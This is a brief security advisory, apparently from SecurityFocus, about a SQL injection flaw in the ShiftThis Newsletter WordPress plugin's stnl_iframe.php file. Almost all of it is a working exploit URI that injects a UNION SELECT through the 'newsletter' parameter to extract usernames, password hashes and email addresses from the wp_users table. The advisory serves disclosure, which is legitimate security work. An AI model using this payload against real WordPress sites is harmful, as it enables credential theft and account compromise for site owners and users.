ShiftThis Newsletter WordPress Plugin 'stnl_iframe.php' SQL Injection Vulnerability

An attacker can exploit this issue with a browser.

The following example URI is available:

http://www.example.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--


 

Privacy Statement
Copyright 2010, SecurityFocus